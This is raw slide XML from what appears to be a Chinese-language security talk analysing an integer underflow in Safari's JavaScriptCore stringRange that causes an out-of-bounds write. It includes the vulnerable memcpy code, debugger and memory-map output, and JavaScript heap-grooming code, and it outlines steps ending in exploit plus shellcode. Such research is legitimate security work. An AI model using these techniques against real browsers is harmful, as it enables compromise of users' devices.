            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>            }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>        }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008777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61805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Safari  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>stringRange</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>整数下溢出</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>分析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09131" y="1281954"/>
            <a:ext cx="10014793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template &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>typename</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> T&gt; static void </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>copyChars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(T* destination, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>const</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> T* source, unsigned </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>numCharacters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>numCharacters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> == 1) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>            *destination = *source;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>            return;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>        }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>        if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>numCharacters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> &lt;= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>s_copyCharsInlineCutOff</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>	…</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/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}else{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>	 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>memcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(destination, source, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>numCharacters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(T));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>	}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="上箭头 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6203576" y="4652682"/>
            <a:ext cx="484632" cy="978408"/>
          </a:xfrm>
          <a:prstGeom prst="upArrow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上箭头 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="8731248" y="5291601"/>
            <a:ext cx="290997" cy="1604682"/>
          </a:xfrm>
          <a:prstGeom prst="upArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF00"/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9679088" y="5801554"/>
            <a:ext cx="1688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/>
              <a:t>0xffffffff</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3200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173" y="4900148"/>
            <a:ext cx="7002899" cy="146188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692274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4071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Safari  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1"/>
              <a:t>stringRange</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>整数下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>溢出漏洞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55699" y="1568822"/>
            <a:ext cx="8051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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>memcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(destination, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>source, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>numCharacters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>(T</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0"/>
              <a:t>));</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN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1073480" y="2574181"/>
            <a:ext cx="10598567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* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>JavaScriptCore`WTF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>tryFastMalloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>(size=1048666) + 101 at FastMalloc.cpp:315, name = '</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>WebCore</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>: Worker', stop reason = step over  * frame #0: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>JavaScriptCore`WTF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>tryFastMalloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>(size=1048666) + 101 at FastMalloc.cpp:315    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>JavaScriptCore`WTF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>RefPtr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>&lt;WTF::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>StringImpl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>&gt; WTF::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>StringImpl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>::</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1"/>
              <a:t>tryCreateUninitialized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>&lt;unsigned char&gt;(length=1048646, output=&lt;no value available&gt;) + 149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945163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699" y="444317"/>
            <a:ext cx="57411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01.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>多线程利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>safari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>越界写漏洞步骤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55699" y="1541930"/>
            <a:ext cx="1057013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1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>申请大量内存，利用堆风水挖洞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en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>创建新线程，在线程中触发漏洞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en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>3 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>主线程进入“等待”状态，只有内存被漏洞篡改，等待才结束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en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>4 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>主线程执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>shellcode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12490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4761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1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>申请大量内存，利用堆风水挖洞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7536" y="932795"/>
            <a:ext cx="9528770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for(var i=0;i&lt;0x600;i=i+1){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>    var uintArray;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>    if(i!=0x155){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>		var buffer=new ArrayBuffer(0x100000-0x40);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>		uintArray=new Uint32Array(buffer);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>	}else{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>		uintArray=new Array(0x20000-0x40);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>		uintArray[0]=i;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>	}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>   array1[i]=uintArray;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="709051" y="5243976"/>
            <a:ext cx="60234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/>
              <a:t>for(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>=0;i&lt;0x200;i=i+2){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>    array1[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>]="";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3200" dirty="0"/>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" alt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132754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81318" y="1389528"/>
            <a:ext cx="1128656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WebKit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>          000000010b600000-000000010b607000 [   28K] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> SM=PRV  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>WebKit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>          000000010b60e000-000000010b7f9000 [ 1964K] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> SM=PRV  ...c_0x1030d1038</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WebKit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 err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>          000000010b800000-000000016c200000 [  1.5G] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> SM=PRV  ...c_0x1030d1038</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>WebKit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>          000000016c200000-000000016c208000 [   32K] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> SM=PRV  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>WebKit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>          000000016c20c000-000000016c3fc000 [ 1984K] </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>-/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>rwx</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> SM=PRV  ...c_0x1030d1038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816608" y="4169664"/>
            <a:ext cx="70888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/>
              <a:t>0x600</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>个堆块就有很好的连续性</a:t>
            </a:r>
            <a:endParaRPr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1010727" y="351680"/>
            <a:ext cx="6986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/>
              <a:t>1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>申请大量内存，利用堆风水挖洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="Group 362"/>
          <p:cNvGrpSpPr/>
          <p:nvPr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7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8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413431596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09212" y="413861"/>
            <a:ext cx="5394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1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>申请大量内存，利用堆风水挖洞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418750" y="2977932"/>
            <a:ext cx="914400" cy="914400"/>
          </a:xfrm>
          <a:prstGeom prst="round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流程图: 可选过程 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1705621" y="3623391"/>
            <a:ext cx="914400" cy="612648"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartAlternateProcess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流程图: 可选过程 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="43738" y="3026065"/>
            <a:ext cx="1290205" cy="715089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Freed</a:t>
            </a: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1338069" y="302606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2763457" y="3026066"/>
            <a:ext cx="1290205" cy="715089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Freed</a:t>
            </a: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053662" y="304532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流程图: 可选过程 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5479050" y="3064580"/>
            <a:ext cx="1290205" cy="715089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Freed</a:t>
            </a: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6769255" y="3064580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8194643" y="3064580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9620031" y="3064580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11045419" y="3050811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68811" y="1291637"/>
            <a:ext cx="1151068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前</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>0x200</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>堆块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freed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>arraybuffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>-&gt;data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>交替，后</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>0x400</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>个全是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>arraybuffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>-&gt;data</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="512856" y="4514788"/>
            <a:ext cx="112548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/>
              <a:t>Safari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>引入隔离堆之前，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>jsArray</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>Arraybuffer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>m_data,stringimpl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>m_data</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>都是在同一个堆上申请内存的</a:t>
            </a:r>
            <a:r>
